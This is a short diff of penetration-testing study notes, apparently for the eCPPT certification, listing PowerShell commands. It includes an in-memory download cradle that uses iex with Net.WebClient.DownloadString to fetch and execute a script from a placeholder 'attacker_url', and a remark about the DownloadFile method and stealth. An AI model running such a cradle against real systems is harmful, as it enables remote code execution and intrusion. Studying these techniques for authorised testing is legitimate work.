ForeCyberSec/eCPPT-Notes/Command-list.md

 # PowerShell

-// in memory download cradle. if using cmd prompt, use single quotes instead.
-This downloads and executes a remotely hosted PS script
+// in memory download cradle. if using cmd prompt, use single quotes instead This downloads and executes a remotely hosted PS script

 PS C:\> iex (New-Object Net.WebClient).DownloadString("http://attacker_url/script.ps1")

 //DownloadFile method.
 Do not use this if trying to remain stealthy.
 The local var is where the file will be saved to